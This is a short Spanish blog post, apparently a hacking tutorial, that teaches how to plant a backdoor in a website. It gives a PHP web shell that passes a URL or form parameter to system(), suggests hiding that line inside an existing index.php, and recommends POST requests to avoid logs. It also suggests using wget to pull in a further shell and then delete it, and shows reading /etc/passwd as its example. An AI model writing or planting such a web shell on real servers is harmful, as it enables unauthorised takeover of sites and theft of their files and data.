Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea).
Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El codigo seria así:
<form method="GET" action="lol.php">
<input type="text" name="comando">
<input type="submit" value="ejecutar">
<?php
if(isset($_GET['comando']));{
$lol = @system($_GET['comando']);
echo $lol;
}
?>
En el formulario ponemos que comando ejecutar, asi tenemos control sobre el servidor y podemos ejecutar cualquier comando, si te da la gana usas wget (LINUX) y subes una shell y la borras, un claro ejemplo de como funciona seria este:
System: Es una función que permite ejecutar comandos dentro de un servidor.
En la foto lo que hicé fue ejecutar el comando cat /etc/passwd y como pueden ver se ejecuto satisfactoriamente.
Otra cosa que podemos hacer es poner
$lol = @system($_GET['comando']);
en algún archivo ejemplo index.php y llamar a la variable lol por url y ejecutar el comando un ejemplo seria servidor.com/index.php?comando=cat+%2Fetc%2Fpasswd
y ejecutaria lo que es el comando.
Espero que les haya gustado.
Un saludo.
0 comentarios:
Publicar un comentario